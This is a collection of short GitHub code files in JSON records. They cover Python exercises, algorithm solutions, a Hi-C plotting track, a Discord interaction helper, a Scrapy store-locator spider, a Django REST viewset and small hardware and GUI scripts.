+{"seq_id":"6280368196","text":"# exercise 2: calculate body mass index\nweight = input(\"enter your weight in kg: \")\nheight = input(\"enter your height in m: \")\n\nfbmi = float(weight) / (float(height) ** 2)\nibmi = round(fbmi, 2)\n\nprint(f\"Your BMI is {ibmi} \")\n\nif ibmi <= 18.5:\n print(\"Your are UNDERWEIGHT.\")\nelif ibmi <= 25:\n print(\"You are NORMAL WEIGHT.\")\nelif ibmi <= 30:\n print(\"You are OVERWEIGHT.\")\nelif ibmi <= 35:\n print(\"You are OBESED.\")\nelse:\n print(\"You are CLINICALLY OBESED.\")","repo_name":"tasha-olivia/pythonCourse","sub_path":"python 100/day 2/exercise2_bmi.py","file_name":"exercise2_bmi.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"690994641","text":"from typing import Union\n\nfrom classes.response import InteractionResponse, InteractionCallbackData, InteractionCallbackType, InteractionCallbackDataFlags\n\nfrom classes.member import Member\nfrom classes.user import User\n\nfrom classes.components import ActionRow, Button, SelectMenu\n\n\nclass Context:\n def __init__(self, interaction_type, http, interaction):\n self._acked = False\n\n self.type = interaction_type\n\n self.http = http\n self.interaction = interaction\n self.interaction_id = int(interaction['id'])\n self.application_id = int(interaction['application_id'])\n self.interaction_token = interaction['token']\n\n @property\n def guild_id(self) -> int:\n return int(self.interaction['guild_id']) if 'guild_id' in self.interaction else None\n\n @property\n def channel_id(self) -> int:\n return int(self.interaction['channel_id']) if 'channel_id' in self.interaction else None\n\n @property\n def author(self) -> Union[Member, User]:\n return Member(self.interaction['member']) if 'member' in self.interaction else User(self.interaction['user'])\n\n @property\n def message(self) -> dict:\n return self.interaction['message'] if 'message' in self.interaction else None\n\n async def respond(self, content=None, embeds=None, ephemeral=False, components=None):\n if ephemeral:\n ephemeral = InteractionCallbackDataFlags.EPHEMERAL.value\n else:\n ephemeral = 0\n if components:\n if isinstance(components, ActionRow):\n components = [components.to_json()]\n elif isinstance(components, Button) or isinstance(components, SelectMenu):\n row = ActionRow()\n row.add_components(components)\n components = [row]\n else:\n rows = []\n row = ActionRow()\n for i, component in enumerate(components):\n if i % 5 == 0 and i != 0:\n rows.append(row)\n row = ActionRow()\n row.add_components(component)\n components = rows\n data = InteractionCallbackData(content=content, embeds=embeds, flags=ephemeral, components=components)\n if self.type == 2:\n if not self._acked:\n return InteractionResponse(InteractionCallbackType.CHANNEL_MESSAGE_WITH_SOURCE, data)\n else:\n await self.http.request('POST', f'/webhooks/{self.application_id}/{self.interaction_token}', json=data)\n elif self.type == 3:\n if not self._acked:\n return InteractionResponse(InteractionCallbackType.UPDATE_MESSAGE, data)\n else:\n await self.http.request('PATCH', f'/webhooks/{self.application_id}/{self.interaction_token}/messages/@original', json=data.to_json())\n","repo_name":"random-duk/ducky-interactions","sub_path":"classes/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34526349885","text":"import sys\r\n\r\nN,K=map(int,sys.stdin.readline().split())\r\n\r\ninputs=sys.stdin.readline().strip()\r\n\r\narr=[]\r\n\r\nfor ch in inputs:\r\n if ch == 'H':\r\n arr.append(False)\r\n else:\r\n arr.append(True)\r\n# print(inputs)\r\n# print(arr)\r\n\r\ncnt=0\r\nfor i in range(len(inputs)):\r\n if inputs[i]=='H':\r\n for idx in range(max(i-K,0),min(i+K+1,len(inputs))):\r\n if arr[idx]==True:\r\n arr[idx]=False\r\n cnt+=1\r\n break\r\n\r\n\r\nprint(cnt)\r\n","repo_name":"hyun132/Algorithm_with_python","sub_path":"햄버거 분배.py","file_name":"햄버거 분배.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22779550448","text":"import matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\nfrom mpl_toolkits.axes_grid1.colorbar import colorbar\n\nimport numpy as np\nfrom scipy import ndimage\n\nfrom coolbox.utilities import (\n GenomeRange,\n change_chrom_names,\n get_logger\n)\n\nfrom coolbox.plots.track.base import TrackPlot\n\n\nlog = get_logger(__name__)\n\n\nSTYLE_TRIANGULAR = 'triangular'\nSTYLE_MATRIX = 'matrix'\nSTYLE_WINDOW = 'window'\n\nDEPTH_FULL = 'full'\n\n\nclass PlotHiCMatrix(TrackPlot):\n\n DEFAULT_COLOR = 'YlOrRd'\n\n def __init__(self, *args, **kwargs):\n TrackPlot.__init__(self, *args, **kwargs)\n\n self.__set_default_properties()\n\n self.small_value = 1e-12\n self.ax = None\n self.label_ax = None\n self.matrix = None\n self._out_of_bound = False\n\n from coolbox.utilities.hic.tools import file_type\n self.file_type = file_type(self.properties['file'])\n\n self.fetched_binsize = None\n\n def __set_default_properties(self):\n self.properties['height'] = 'hic_auto'\n\n if 'color' not in self.properties:\n self.properties['color'] = self.DEFAULT_COLOR\n if 'style' not in self.properties:\n self.properties['style'] = STYLE_TRIANGULAR\n if 'balance' not in self.properties:\n self.properties['balance'] = 'no'\n if 'color_bar' not in self.properties:\n self.properties['color_bar'] = 'yes'\n if 'transform' not in self.properties:\n self.properties['transform'] = 'no'\n if 'title' not in self.properties:\n self.properties['title'] = ''\n if 'depth_ratio' not in self.properties:\n self.properties['depth_ratio'] = DEPTH_FULL\n if 'norm' not in self.properties:\n self.properties['norm'] = 'log'\n\n @property\n def is_inverted(self):\n if 'orientation' in self.properties and self.properties['orientation'] == 'inverted':\n return True\n else:\n # default: not inverted\n return False\n\n @property\n def style(self):\n if 'style' in self.properties:\n return self.properties['style']\n else:\n # default triangular style\n return STYLE_TRIANGULAR\n\n @property\n def balance(self):\n if self.properties['balance'] == 'no':\n return False\n else:\n if self.file_type == '.hic':\n if self.properties['balance'] == 'yes':\n return 'KR' # default use KR balance\n else:\n return self.properties['balance']\n else:\n return True\n\n @property\n def is_balance(self):\n return bool(self.balance)\n\n def __transform_matrix(self, arr):\n if self.properties['transform'] == 'log10':\n arr = np.log10(arr)\n elif self.properties['transform'] == 'log2':\n arr = np.log2(arr)\n elif self.properties['transform'] == 'log':\n arr = np.log(arr)\n return arr\n\n @property\n def matrix_val_range(self):\n small = 1e-4\n arr = self.matrix\n arr_no_nan = arr[np.logical_not(np.isnan(arr))]\n\n if self.properties['min_value'] == 'auto':\n # set minimal value for color bar\n min_ = arr[arr > arr.min()].min()\n else:\n min_ = self.properties['min_value']\n\n if self.properties['max_value'] == 'auto':\n max_ = arr_no_nan.max()\n else:\n max_ = self.properties['max_value']\n\n if max_ <= min_:\n max_ = min_ + small\n\n return min_, max_\n\n def __fetch_matrix(self, genome_range, resolution='auto'):\n \"\"\"\n Fetch the matrix.\n\n Parameters\n ----------\n genome_range : coolbox.utilities.GenomeRange\n The genome range to fetch.\n\n resolution : {'auto', int}\n The matrix resolution, for multi-resolution(.hic or multi-cool) file.\n Use 'auto' to infer the resolution automatically.\n default 'auto'\n \"\"\"\n from coolbox.utilities.hic.wrap 
import StrawWrap, CoolerWrap\n\n path = self.properties['file']\n if self.file_type == '.hic':\n wrap = StrawWrap(path, normalization=self.balance, binsize=resolution)\n else:\n wrap = CoolerWrap(path, balance=self.balance, binsize=resolution)\n\n arr = wrap.fetch(genome_range)\n\n self.fetched_binsize = wrap.fetched_binsize # expose fetched binsize\n\n # fill zero and nan with small value\n small = self.small_value\n arr[arr == 0] = small\n arr[np.isnan(arr)] = small\n\n if 'transform' in self.properties and self.properties['transform'] != 'no':\n arr = self.__transform_matrix(arr)\n\n return arr\n\n def __get_triangular_matrix(self, arr):\n small = self.small_value\n tri_matrix = ndimage.rotate(arr, 45, prefilter=False, cval=small)\n\n rows = tri_matrix.shape[0]\n\n tri_matrix = tri_matrix[0:(rows//2 + 1), :]\n\n # cut depth\n if self.properties['depth_ratio'] != 'auto' and self.properties['depth_ratio'] != DEPTH_FULL:\n depth_ratio = float(self.properties['depth_ratio'])\n depth = int(tri_matrix.shape[0] * depth_ratio)\n tri_matrix = tri_matrix[-depth:, :]\n\n return tri_matrix\n\n def __get_window_matrix(self, arr):\n small = self.small_value\n window_matrix = ndimage.rotate(arr, 45, prefilter=False, cval=small)\n rows, cols = window_matrix.shape\n if self._out_of_bound == 'left':\n # left side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :(2*x+1)]\n elif self._out_of_bound == 'right':\n # right side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :(2*x+1)]\n elif self._out_of_bound == 'both':\n # double side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :]\n else:\n # normal\n x = cols // 4\n window_matrix = window_matrix[(rows//4):(rows//2 + 1), x:(3*x + 1)]\n\n # cut depth\n if self.properties['depth_ratio'] != 'auto' and self.properties['depth_ratio'] != DEPTH_FULL:\n depth_ratio = float(self.properties['depth_ratio'])\n depth = int(window_matrix.shape[0] * depth_ratio)\n window_matrix = window_matrix[-depth:, :]\n\n return window_matrix\n\n def __plot_matrix(self, genome_range):\n start, end = genome_range.start, genome_range.end\n ax = self.ax\n arr = self.matrix\n cmap = plt.get_cmap(self.properties['color'])\n cmap.set_bad(\"white\")\n cmap.set_under(\"white\")\n c_min, c_max = self.matrix_val_range\n\n depth_ratio = 1.0 if self.properties['depth_ratio'] == DEPTH_FULL else self.properties['depth_ratio']\n\n if self.style == STYLE_TRIANGULAR:\n # triangular style\n tri_matrix = self.__get_triangular_matrix(arr)\n img = ax.matshow(tri_matrix, cmap=cmap,\n extent=(start, end, 0, depth_ratio * (end - start)/2),\n aspect='auto')\n elif self.style == STYLE_WINDOW:\n # window style\n window_matrix = self.__get_window_matrix(arr)\n img = ax.matshow(window_matrix, cmap=cmap,\n extent=(start, end, 0, depth_ratio * (end - start)/2),\n aspect='auto')\n else:\n # matrix style\n img = ax.matshow(arr, cmap=cmap,\n extent=(start, end, end, start),\n aspect='auto')\n\n if self.properties['norm'] == 'log':\n img.set_norm(colors.LogNorm(vmin=c_min, vmax=c_max))\n else:\n img.set_norm(colors.Normalize(vmin=c_min, vmax=c_max))\n\n return img\n\n def __adjust_figure(self, genome_range):\n ax = self.ax\n start, end = genome_range.start, genome_range.end\n if self.style == STYLE_TRIANGULAR or self.style == STYLE_WINDOW:\n\n if self.properties['depth_ratio'] == DEPTH_FULL:\n depth = genome_range.length / 2\n else:\n depth = (genome_range.length / 2) * 
self.properties['depth_ratio']\n\n if self.is_inverted:\n ax.set_ylim(depth, 0)\n else:\n ax.set_ylim(0, depth)\n else:\n ax.set_ylim(end, start)\n ax.set_xlim(start, end)\n\n def __plot_colorbar(self, img, orientation='vertical'):\n if orientation == 'horizontal':\n ax_divider = make_axes_locatable(self.ax)\n if self.is_inverted:\n cax = ax_divider.append_axes(\"top\", size=0.09, pad=0.2)\n else:\n cax = ax_divider.append_axes(\"bottom\", size=0.09, pad=0.2)\n colorbar(img, cax=cax, orientation='horizontal')\n else: # vertical\n y_ax = self.y_ax\n\n if self.properties['norm'] == 'log':\n from matplotlib.ticker import LogFormatter\n formatter = LogFormatter(10, labelOnlyBase=False)\n aa = np.array([1, 2, 5])\n c_min, c_max = self.matrix_val_range\n\n def abs_inc(num):\n if num != 0:\n sign = num / abs(num)\n return int(sign * abs(num + 1))\n else:\n return 1\n\n lower_ = int(np.log10(c_min))\n upper_ = abs_inc(int(np.log10(c_max)))\n tick_values = np.concatenate([aa * 10 ** x for x in range(lower_, upper_)])\n\n c_bar = plt.colorbar(img, ax=y_ax, ticks=tick_values, format=formatter, fraction=0.98)\n else:\n c_bar = plt.colorbar(img, ax=y_ax, fraction=0.98)\n\n c_bar.solids.set_edgecolor(\"face\")\n c_bar.ax.tick_params(labelsize='smaller')\n\n c_bar.ax.yaxis.set_ticks_position('left')\n\n def __fetch_window_matrix(self, genome_range):\n from copy import copy\n fetch_range = copy(genome_range)\n x = (genome_range.end - genome_range.start) // 2\n fetch_range.start = genome_range.start - x\n fetch_range.end = genome_range.end + x\n\n if fetch_range.start < 0:\n fetch_range.start = genome_range.start\n self._out_of_bound = 'left'\n\n try:\n arr = self.__fetch_matrix(fetch_range)\n except ValueError as e:\n if self._out_of_bound == 'left':\n self._out_of_bound = 'both'\n arr = self.__fetch_matrix(genome_range)\n else:\n self._out_of_bound = 'right'\n fetch_range.end = genome_range.end\n arr = self.__fetch_matrix(fetch_range)\n return arr, fetch_range\n\n def plot(self, ax, chrom_region, start_region, end_region):\n self.ax = ax\n\n self._out_of_bound = False\n\n log.debug(\"plotting {}\".format(self.properties['file']))\n\n genome_range = GenomeRange(chrom_region, start_region, end_region)\n\n self.ax = ax\n\n # fetch matrix and perform transform process\n if self.style == STYLE_WINDOW:\n arr, fetch_region = self.__fetch_window_matrix(genome_range)\n self.fetch_region = fetch_region\n else:\n arr = self.__fetch_matrix(genome_range)\n\n self.matrix = arr\n\n # plot matrix\n img = self.__plot_matrix(genome_range)\n self.__adjust_figure(genome_range)\n\n # plot colorbar\n if self.properties['color_bar'] == 'yes':\n if hasattr(self, 'y_ax') and self.style == STYLE_WINDOW:\n self.__plot_colorbar(img, orientation='vertical')\n else:\n self.__plot_colorbar(img, orientation='horizontal')\n else:\n pass\n\n # plot label\n self.plot_label()\n\n def get_track_height(self, frame_width):\n \"\"\"\n calculate track height dynamically.\n \"\"\"\n if self.style == STYLE_TRIANGULAR:\n height = frame_width * 0.5\n elif self.style == STYLE_WINDOW:\n if 'height' in self.properties and self.properties['height'] != 'hic_auto':\n height = self.properties['height']\n else:\n height = frame_width * 0.3\n else:\n height = frame_width * 0.8\n\n if 'depth_ratio' in self.properties and self.properties['depth_ratio'] != DEPTH_FULL:\n if self.properties['style'] != STYLE_MATRIX:\n height = height * self.properties['depth_ratio']\n\n if 'color_bar' in self.properties and self.properties['color_bar'] != 'no':\n height += 
1.5\n\n return height\n","repo_name":"raivivek/CoolBox","sub_path":"coolbox/plots/track/hicmatrix.py","file_name":"hicmatrix.py","file_ext":"py","file_size_in_byte":12979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"}
+{"seq_id":"12147505517","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n# O(min(n, m)) Time | O(1) Space\ndef merge_lists(head_1, head_2):\n new_head = Node(None)\n tail = new_head\n current_1 = head_1\n current_2 = head_2\n \n while current_1 is not None and current_2 is not None:\n if current_1.val < current_2.val:\n tail.next = current_1\n current_1 = current_1.next\n else:\n tail.next = current_2\n current_2 = current_2.next\n tail = tail.next\n if current_1 is not None: tail.next = current_1\n if current_2 is not None: tail.next = current_2\n \n return new_head.next","repo_name":"JeffersonGarcia15/Data-Structures-Algorithms","sub_path":"data_structures/merge_lists.py","file_name":"merge_lists.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"33078129205","text":"import pyfirmata\nfrom pyfirmata import Arduino, util\nimport time\nimport math\n\nboard = Arduino('COM3')\n\n#pin = board.get_pin('a:0:i') #analog pin 0 input\n\ncontrol = board.analog[1]\n\niterator = util.Iterator(board)\niterator.start()\ntime.sleep(0.1)\n\ntry:\n while True:\n control.enable_reporting()\n val = control.read()\n\n if(val == None):\n continue\n\n val = val*10\n\n if(val == 0):\n val = 1\n\n val = math.ceil(val)\n \n print(str(val))\n\n time.sleep(0.1)\n\nexcept KeyboardInterrupt:\n board.exit()\n","repo_name":"rdaw6/Dancing-Lights--Sr-Design","sub_path":"Indv Controls Tests/potentiometer_test.py","file_name":"potentiometer_test.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"8229248895","text":"import unittest\nimport requests\nimport json\nimport sys\nsys.path.append(\"../..\") # 提升2级到项目根目录下\n\nfrom lib.read_excel import * # 从项目路径下导入\nfrom lib.case_log import log_case_info # 从项目路径下导入\n\n\nclass BaseCase(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n if cls.__name__ != 'BaseCase':\n cls.data_list = excel_to_list(data_file, cls.__name__)\n\n def get_case_data(self, case_name):\n return get_test_data(self.data_list, case_name)\n\n def send_request(self, case_data):\n case_name = case_data.get('case_name')\n url = case_data.get('url')\n args = case_data.get('args')\n expect_res = case_data.get('expect_res')\n method = case_data.get('method')\n data_type = case_data.get('data_type')\n\n if method.upper() == 'GET':\n res = requests.get(url=url, params=json.loads(args))\n\n elif data_type.upper() == 'FORM':\n res = requests.post(url=url, data=json.loads(args))\n log_case_info(case_name, url, args, expect_res, res.text)\n self.assertEqual(res.text, expect_res)\n else:\n res = requests.post(url=url, json=json.loads(args))\n log_case_info(case_name, url, args, json.dumps(json.loads(expect_res), sort_keys=True),\n json.dumps(res.json(), ensure_ascii=False, sort_keys=True))\n self.assertDictEqual(res.json(), json.loads(expect_res))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n print(issubclass(BaseCase,BaseCase))","repo_name":"hanzhichao/api_test_framework","sub_path":"test/case/basecase.py","file_name":"basecase.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"42392983260","text":"import re\n\nfrom scrapy import FormRequest\nfrom scrapy.http import Response\n\nfrom StoreScraper.items import StoreItem\nfrom StoreScraper.spiders import base_spider\n\n\nclass PanasonicSpider(base_spider.BaseSpider):\n name = \"panasonicproclub.com\"\n\n def start_requests(self):\n post_data = {\n 'geo': '0',\n 'lat': '51.165691',\n 'lng': '10.451526',\n 'address': 'Deutschland',\n 'selected_list': '36',\n 'distance': '500',\n 'search': ''\n }\n yield FormRequest(url='https://www.panasonicproclub.com/ifinder/DE_de/home/', formdata=post_data)\n\n def parse(self, response: Response, **kwargs):\n values = re.findall(r'marcadores\\[(\\d+)]\\[(\\d+)]\\s*=\\s*\"(.*?)\";', response.text)\n results = dict()\n for row_index, column_index, value in values:\n if row_index not in results:\n results[row_index] = {\n 'Source': self.name\n }\n if column_index == '0':\n results[row_index]['Name1'] = value\n if column_index == '1':\n results[row_index]['Address'] = value\n if column_index == '99':\n results[row_index]['Zip'] = value\n if column_index == '100':\n results[row_index]['City'] = value\n if column_index == '3':\n results[row_index]['Phone'] = value\n if column_index == '4':\n results[row_index]['Email'] = value\n if column_index == '5':\n results[row_index]['Website'] = value\n if column_index == '6':\n results[row_index]['Latitude'] = value\n if column_index == '7':\n results[row_index]['Longitude'] = value\n for key, value in results.items():\n parsed_result = StoreItem(**value)\n yield self.add_unique_address_id(parsed_result)\n","repo_name":"ptsonev/StoreScraper","sub_path":"StoreScraper/spiders/panasonic_spider.py","file_name":"panasonic_spider.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"1034970260","text":"peso = 0\n\nmaior = 0\n\nmenor = 500\n\nfor c in range (1,6):\n\n peso = float(input('Qual o peso da {}º pessoa? (kg)'.format(c)))\n\n if peso>maior:\n\n maior = peso\n\n elif peso int:\n i = 0\n tempArea = 0\n arLength = len(height)\n for i in range(arLength):\n for j in range(i+1,arLength):\n if height[i] > height[j]:\n area = height[j] * (j-i)\n else:\n area = height[i] * (j-i)\n if area > tempArea:\n tempArea = area\n print(\"area:\"+str(area))\n print(\"temparea:\"+str(tempArea))\n \n return tempArea\n\n #viewed solution\n def maxArea(self,height: list[int]) -> int:\n left = 0\n right = len(height)-1\n area = 0\n while right > left:\n tarea = min(height[left], height[right]) * (right - left)\n\n if tarea > area:\n area = tarea\n \n if height[left] < height[right]:\n left = left + 1\n elif height[left] > height[right]:\n right = right - 1\n else:\n left = left + 1\n right = right - 1\n return area\n\nS1 = Solution()\nheight = [1,8,6,2,5,4,8,3,7]\nprint(S1.maxArea(height))\n\n\n\n","repo_name":"ocnow/CodeProblems","sub_path":"LeetCode/container-with-most-water.py","file_name":"container-with-most-water.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"36205162908","text":"'''\nProblem Description: \nFind the pairs comprising of two elements, inside an array.\n\nInput : array = [1,2,31,55,3,4,5,6,19] / target = 50\nOutput : [31,19]\n'''\n\nimport time\n\n\n## Method 1: Brute Force Aproach\ndef pairSumV1(nums,target):\n res = []\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n if(nums[i],nums[j] == target):\n res.append([nums[i],nums[j]])\n return res\n\n\n## Method 2: Sorted Only, Implemented using general Double Pointer Approach\ndef pairSumV2(nums, target):\n res = []\n start, end = 0, len(nums)-1\n while(start < end):\n _sum = nums[start] + nums[end]\n if(_sum == target):\n res.append([nums[start], nums[end]])\n start += 1\n end -= 1\n elif(_sum > target):\n end -= 1\n elif(_sum < target):\n start += 1\n return res if res else []\n\n\n## Method 3: Pair Sum, Implemented on unsorted Array using Hashset;\ndef pairSumV3(nums, target):\n temp = {}\n res = []\n for (key,value) in enumerate(nums): # enumerate(nums) => key:value;\n needed = target-value\n if needed in temp:\n res.append([needed, value])\n else:\n temp[value]=key\n return res\n\ndef main():\n try:\n # res = pairSumV1(nums=[9,8,21,46,23,45,1,2,3,4,5], target=50) # Unsorted\n res1 = pairSumV2(nums=[1, 2, 3, 4, 5, 8, 9, 21, 23, 45, 46], target=50) # Sorted\n res2 = pairSumV3(nums=[9, 8, 21, 46, 23, 45, 1, 2, 3, 4, 5], target=50) # Unsorted\n print(res1) if res1 else print(\"Empty!\")\n print(res2) if res2 else print(\"Empty!\")\n \n except(Exception) as e:\n print(f\"Exception Traced : {e}\")\n \n else:\n print(\"Program Completed : Success\")\n\n finally:\n print(\"Program Terminated!\")\n\n \nif __name__ == '__main__':\n print(\"#------------ Code Start --------------#\")\n startTime = time.time()\n main()\n endTime = time.time()\n print(\"Run Time:\",endTime-startTime,\"ms\")\n print(\"#------------ Code Stop ----------------#\")\n ","repo_name":"neerajsinghjr/dsa","sub_path":"coding-minutes/01.Array/P001_Sort_array_Pair_Sum.py","file_name":"P001_Sort_array_Pair_Sum.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"12238736870","text":"import numpy as np\n\n# this script will solve a system of linear equations\n# to determine the optimal angular offsets to align Pmx\n\n#dPmx = E'*cos(theta_e)*dtheta_e - pf*cos(theta_p)dtheta_p\n#dPmz = E'*sin(theta_e)*dtheta_e + pf*sin(theta_p)dtheta_p\n\n\na_00 = 3. # Ef * np.cos(theta_e)\na_01 = 2 #-pf * np.cos(theta_p)\na_10 = 0 # Ef * np.sin(theta_e)\na_11 = 6 # pf * np.sin(theta_p)\n\n\nA = np.array([[a_00, a_01], \n [a_10, a_11]])\n\nA_inv = np.linalg.inv(A)\n\n#dth = [ dtheta_e, dtheta_p ]\n#dPm = [ dPmx, dPmz ]\n\n\nresult = A_inv.dot(x)\nprint('result=',result)\n\n","repo_name":"Yero1990/cafe_offline_replay","sub_path":"post_analysis/special_studies/heep_check/calculate_offsets.py","file_name":"calculate_offsets.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"14169788407","text":"import random\nsecret =random.randint(1,10)\ntimes = 3\nguess = 0\nprint(\"来,猜猜哥现在心里想的数字是几.\", end=\"\")\nwhile (guess != secret) and (times > 0):\n temp = input('请在此处输入')\n guess = int(temp)\n times = times - 1\n if guess == secret:\n print('恭喜你,答对了!')\n print('哼,答对也没有奖励哦')\n else:\n if guess > secret:\n print('大了大了')\n else:\n print('小了小了')\n if times > 0:\n print('再来一次,')\n else:\n print('对不起,机会用完喽')\nprint(\"游戏结束,谢谢参与!\")\n","repo_name":"unclelaozhang/Python_fishc","sub_path":"改进小游戏独立完成.py","file_name":"改进小游戏独立完成.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72450674669","text":"notas = input()\nnota1 = ''\nvar = True\n\nwhile var:\n for v in notas:\n if v.isdigit() or v == '.':\n nota1 += v\n else:\n var = False\n break\n\nnota2 = ''.join(x for x in notas if x not in nota1)\n\nif nota2 == ' ':\n nota2 += notas[0]\n nota2 += notas[1]\n\nmedia = (float(nota1) + float(nota2)) / 2\n\nif media >= 7:\n print('Aprovado')\n\nelif media >= 4:\n print('Recuperacao')\n\nelse:\n print('Reprovado')","repo_name":"gabrielbelo2007/Activities","sub_path":"Activities (NEPS)/Aprovado ou Reprovado.py","file_name":"Aprovado ou Reprovado.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"44348204317","text":"import tkinter as tk\r\nfrom tkinter import simpledialog\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.withdraw()\r\n value = simpledialog.askstring(\"Entrada\", \"Ingresa un valor:\")\r\n root = tk.Tk()\r\n root.withdraw()\r\n value = simpledialog.askstring(\"Entrada\", \"Ingresa un valor:\")\r\n if value is not None:\r\n print(\"Valor ingresado:\", value)\r\n else:\r\n print(\"Ningún valor ingresado.\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"CaDelTo/Cado-Project","sub_path":"ConsolaTryOut.py","file_name":"ConsolaTryOut.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26917068943","text":"# pylint: disable=missing-module-docstring\n# pylint: disable=missing-class-docstring\n# pylint: disable=missing-function-docstring\n\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom rest_framework import generics\nfrom hangrymealsapi.models import RecipeIngredients, Recipe, Ingredient\n\n\n\nclass RecipeIngredientsSerializer(serializers.ModelSerializer):\n class Meta:\n model = RecipeIngredients\n fields = ('id', 'recipe', 'ingredient')\n depth = 2\n\n\nclass RecipeIngredientsView(ViewSet):\n\n def retrieve(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n serializer = RecipeIngredientsSerializer(recipeingredients)\n return Response(serializer.data)\n\n def list(self, request):\n recipeingredients = RecipeIngredients.objects.all()\n recipe = request.query_params.get('recipe', None)\n if recipe is not None:\n recipe = recipeingredients.filter(recipe=recipe.id)\n ingredient = request.query_params.get('ingredient', None)\n if ingredient is not None:\n ingredient = recipeingredients.filter(ingredient=ingredient.id)\n serializer = RecipeIngredientsSerializer(recipeingredients, many=True)\n return Response(serializer.data)\n\n def create(self, request):\n recipe = Recipe.objects.get(pk=request.data[\"recipe\"])\n ingredient = Ingredient.objects.get(pk=request.data[\"ingredient\"])\n recipeingredients = RecipeIngredients.objects.create(\n recipe=recipe,\n ingredient=ingredient,\n )\n serializer = RecipeIngredientsSerializer(recipeingredients)\n return Response(serializer.data)\n\n def update(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n recipe = Recipe.objects.get(pk=request.data[\"recipe\"])\n ingredient = Ingredient.objects.get(pk=request.data[\"ingredient\"])\n recipeingredients.recipe = recipe\n recipeingredients.ingredient = ingredient\n recipeingredients.save()\n\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n def destroy(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n recipeingredients.delete()\n return Response(None, status=status.HTTP_204_NO_CONTENT)\nclass ByRecipeIngredientsView(generics.ListCreateAPIView):\n serializer_class = RecipeIngredientsSerializer\n\n def get_queryset(self):\n recipe_id = self.kwargs['recipe_id']\n return RecipeIngredients.objects.filter(recipe__id=recipe_id)\n","repo_name":"shalane-proctor/hangry-meals-server","sub_path":"hangrymealsapi/views/recipeingredients.py","file_name":"recipeingredients.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"41259498056","text":"class Solution:\n def plusOne(self, digits: 'List[int]') -> 'List[int]':\n i = len(digits)-1\n cnt = 1\n while i >= 0:\n if digits[i]+cnt >= 10:\n digits[i], cnt = 0, 1\n i -= 1\n else:\n digits[i] += cnt\n return digits\n if cnt != 0:\n return [1]+digits\n else:\n return digits\n\n\nif __name__ == \"__main__\":\n print(\n Solution().plusOne(\n [0]\n )\n )","repo_name":"kimroniny/ACM","sub_path":"LeetCode/0066/66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
